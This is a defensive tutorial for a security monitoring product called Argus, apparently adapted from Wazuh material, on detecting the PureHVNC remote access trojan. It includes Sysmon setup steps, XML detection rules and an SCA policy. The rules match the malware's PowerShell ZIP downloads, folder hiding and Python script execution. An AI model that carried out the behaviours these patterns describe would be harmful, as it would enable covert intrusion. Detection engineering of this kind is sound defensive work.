PureHVNC is a covert Remote Access Trojan (RAT) that allows attackers to control Windows endpoints without user detection. The HVNC in PureHVNC stands for “Hidden Virtual Network Computing”. Typically delivered through phishing emails with malicious attachments, it activates upon execution. The malware downloads and opens a decoy PDF, retrieves two ZIP files (DXJS.zip and FTSP.zip) via PowerShell, and extracts their contents into hidden folders within the user’s Downloads directory. It then runs multiple Python scripts (such as money.py, update.py, and others) from the extracted files and reopens the decoy PDF to sustain the ruse. Additionally, PureHVNC establishes communication with a command-and-control (C2) server, enabling attackers to execute remote commands on the infected system.
ANALYZED IOC
Type | Value |
Hash (SHA256) | 441c4502584240624f4af6d67eded476c781ff0b72afe95ea236cc87a50e5650 |
MD5 | 372d3835bc694a7d9934727030bf7be6 |
REQUIREMENTS
- Argus server or Argus manager
- A windows victim endpoint with Argus agent installed
DETECTION WITH ARGUS
Argus capabilities to detect PureHVNC malware on an infected Windows endpoint:
• Using custom detection rules to detect PureHVNC malware activities.
•Using the Argus Security Configuration Assessment (SCA) module to check for the presence of PureHVNC malware artifacts.
DETECTION CRITERIA
- Use Sysmon to monitor several system events on the windows endpoint
- Create rules on the Argus server to detect the malicious activities of PureHVNC malware.
Windows endpoint
Steps to configure the Sysmon on the endpoint and forward logs in the Sysmon event channel to Argus server for analysis
- Download Sysmon from https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
- Extract the compressed Sysmon file to your location
- By using Powershell download the Sysmon Configuration file-sysmonconfig.xml. Replace <SYSMON_EXECUTABLE_PATH> with the path to your Sysmon executable.
wget -Uri https://wazuh.com/resources/blog/emulation-of-attack-techniques-and-detection-with-wazuh/sysmonconfig.xml -OutFile <SYSMON_EXECUTABLE_PATH>\sysmonconfig.xml
- Switch to the directory with the Sysmon executable. Run the command below to install and start Sysmon using PowerShell with Administrator privileges:
.\Sysmon64.exe -accepteula -i sysmonconfig.xml
- Add the following configuration within the <ossec_config> block of the C:\Program Files (x86)\ossec-agent\ossec.conf file to forward Sysmon events to the Argus server:
<localfile>
<location>Microsoft-Windows-Sysmon/Operational</location>
<log_format>eventchannel</log_format>
</localfile>
- Restart the Argus agent
Restart-Service -Name wazuh
Argus server
Create rules to detect the Pure HVNC malware behavior on the endpoint
- Create a file purehvnc_malware.xml in the /var/ossec/etc/rules/ directory
$ nano /var/ossec/etc/rules/purehvnc_malware.xml
- Add the rules to the /var/ossec/etc/rules/purehvnc_malware.xml file:
<group name=”purehvnc,malware,”>
<rule id=”100201″ level=”12″>
<if_sid>61603</if_sid>
<field name=”win.eventdata.Image” type=”pcre2″>(?i)timeout\.exe</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>\/t 5</field>
<field name=”win.eventdata.CommandLine”
type=”pcre2″>REM\sWait\sfor\sPDF\sto\sopen</field>
<description>Possible PureHVNC malware activity: PDF delayed execution with timeout.exe.</description>
<mitre>
<id>T1059</id>
</mitre>
</rule>
<rule id=”100202″ level=”12″>
<if_sid>61603</if_sid>
<field name=”win.eventdata.Image” type=”pcre2″>(?i)powershell\.exe</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>Net.ServicePointManager</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>Net.SecurityProtocolType</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>Invoke-WebRequest\s-Uri</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>DXJS.zip</field>
<description>Possible PureHVNC malware activity: Suspicious ZIP file DXJS.zip downloaded from a remote file share.</description>
<mitre>
<id>T1105</id>
</mitre>
</rule>
<rule id=”100203″ level=”15″>
<if_sid>61603</if_sid>
<field name=”win.eventdata.Image” type=”pcre2″>(?i)powershell\.exe</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>Expand-Archive</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>\-DestinationPath</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>DXJS.zip</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>\-Force</field>
<description>Possible PureHVNC malware activity: Suspicious ZIP file DXJS.zip extracted.</description>
<mitre>
<id>T1059.001</id>
</mitre>
</rule>
<rule id=”100204″ level=”15″>
<if_sid>61603</if_sid>
<field name=”win.eventdata.Image” type=”pcre2″>(?i)attrib\.exe</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>\+h</field>
<description>Possible PureHVNC malware activity: Suspicious folder hiding activity.</description>
<mitre>
<id>T1564.001</id>
</mitre>
</rule>
<rule id=”100205″ level=”15″>
<if_sid>61603</if_sid>
<field name=”win.eventdata.Image” type=”pcre2″>(?i)AppInstallerPythonRedirector\.exe</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>python\.exe</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>(?i)(money|update|upload|time|kam|moment|info)\.py</field>
<description>Possible PureHVNC malware activity: Suspicious Python script executed.</description>
<mitre>
<id>T1059.006</id>
</mitre>
</rule>
<rule id=”100206″ level=”12″>
<if_sid>61603</if_sid>
<field name=”win.eventdata.Image” type=”pcre2″>(?i)powershell\.exe</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>Net.ServicePointManager</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>Net.SecurityProtocolType</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>Invoke-WebRequest\s-Uri</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>FTSP.zip</field>
<description>Possible PureHVNC malware activity: Suspicious ZIP file FTSP.zip downloaded from a remote file share.</description>
<mitre>
<id>T1105</id>
</mitre>
</rule>
<rule id=”100207″ level=”15″>
<if_sid>61603</if_sid>
<field name=”win.eventdata.Image” type=”pcre2″>(?i)powershell\.exe</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>Expand-Archive</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>\-DestinationPath</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>FTSP.zip</field>
<field name=”win.eventdata.CommandLine” type=”pcre2″>\-Force</field>
<description>Possible PureHVNC malware activity: Suspicious ZIP file FTSP.zip extracted.</description>
<mitre>
<id>T1059.001</id>
</mitre>
</rule>
</group>
- Restart the Argus manager
systemctl restart wazuh-manager
Detection results
- Navigate to Threat Hunting > Events
- Click on Add filter
- Filter for rule.id in the Field
- Filter for is one of Operator and give 100201,100202,100203,100204,100205,100206,100207 in the Values field
- Click on Save
Security configuration assessment (SCA)
The Argus SCA module assesses system configurations by comparing them to a predefined set of rules and benchmarks. It conducts checks to verify system hardening, identify vulnerable software, and ensure configuration policies are properly applied on monitored endpoints. By leveraging the SCA module, organizations can strengthen their security posture, maintain compliance with industry standards, and minimize the risk of security breaches.
Windows endpoint
We configure the Argus SCA module to check for the presence of PureHVNC malware artifacts on the Windows endpoint.
- Launch PowerShell with administrative privilege and create a folder to store custom SCA policy files:
> New-Item -Path “C:\Program Files (x86)\” -Name “sca_policies” -ItemType Directory
- Create a file purehvnc_malware_check.yml in the C:\Program Files (x86)\sca_policies folder:
> New-Item -Path ‘C:\Program Files (x86)\sca_policies\purehvnc_malware_check.yml’ -ItemType File
- Add the following content to the C:\Program Files (x86)\sca_policies\purehvnc_malware_check.yml file:
# Security Configuration Assessment
# Audit for PureHVNC malware
# Copyright (C) 2024, Wazuh Inc.
#
# This program is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public
# License (version 2) as published by the FSF – Free Software
# Foundation
policy:
id: “PureHVNC_malware”
file: “purehvnc_malware_check.yml”
name: “PureHVNC malware Windows OS check”
description: “Detecting PureHVNC malware”
requirements:
title: “Checking PureHVNC malware on Windows based systems”
description: “Requirements for running the audit policy under a Windows platform”
condition: all
rules:
– ‘r:HKEY_LOCAL_MACHINE\SAM\SAM’
checks:
– id: 77000
title: “Checking for Possible PureHVNC malware artifacts (ZIP files) in Downloads folder”
description: “Check for ZIP files associated with PureHVNC malware in Downloads folder.”
remediation: “Delete the files DXJS.zip and FTSP.zip from the Downloads folder.”
condition: all
rules:
– ‘not f:C:\Users\<USERNAME>\Downloads\DXJS.zip’
– ‘not f:C:\Users\<USERNAME>\Downloads\FTSP.zip’
– id: 77001
title: “Checking for Possible PureHVNC malware artifacts (Python scripts) in Downloads folder”
description: “Check for Python scripts associated with PureHVNC malware in Downloads folder.”
remediation: “Delete the Python scripts and the Python folder from the Downloads folder.”
condition: all
rules:
– ‘not f:C:\Users\<USERNAME>\Downloads\Python\Python312\money.py’
– ‘not f:C:\Users\<USERNAME>\Downloads\Python\Python312\update.py’
– ‘not f:C:\Users\<USERNAME>\Downloads\Python\Python312\upload.py’
– ‘not f:C:\Users\<USERNAME>\Downloads\Python\Python312\time.py’
– ‘not f:C:\Users\<USERNAME>\Downloads\Python\Python312\kam.py’
– ‘not f:C:\Users\<USERNAME>\Downloads\Python\Python312\moment.py’
– ‘not f:C:\Users\<USERNAME>\Downloads\Python\Python312\info.py’
– id: 77002
title: “Checking for Possible PureHVNC malware artifacts (batch file) in Downloads folder”
description: “Check for batch file associated with PureHVNC malware in Downloads folder.”
remediation: “Delete the startuppp.bat file from the Downloads folder.”
condition: all
rules:
– ‘not f:C:\Users\<USERNAME>\Downloads\startuppp.bat’
– id: 77003
title: “Checking for Possible PureHVNC malware artifacts (folders) in Downloads folder”
description: “Check for folders associated with PureHVNC malware in Downloads folder.”
remediation: “Delete the Python and Print folders from the Downloads folder.”
condition: all
rules:
– ‘not d:C:\Users\<USERNAME>\Downloads\Python’
– ‘not d:C:\Users\<USERNAME>\Downloads\Print’
- Edit the Argus agent C:\Program Files (x86)\ossec-agent\ossec.conf file and include the following configuration within the <sca> block:
<policies>
<policy>C:\Program Files (x86)\sca_policies\purehvnc_malware_check.yml</policy>
</policies>
- Restart the Argus agent
> Restart-Service -Name WazuhSvc
Monitoring the Alerts
Navigate to the Configuration Assessment page on the Argus dashboard. Select the monitored Windows endpoint, then select PureHVNC malware Windows OS check to view the scan results.
A Failed result indicates that the PureHVNC malware artifacts were detected on the endpoint. Conversely, a Passed result indicates that the PureHVNC malware artifacts were not detected and that the endpoint meets the SCA policy criteria.
Conclusion
This usecase demonstrates how to detect PureHVNC malware using Argus and the Argus SCA module to detect PureHVNC malware and its malicious activities.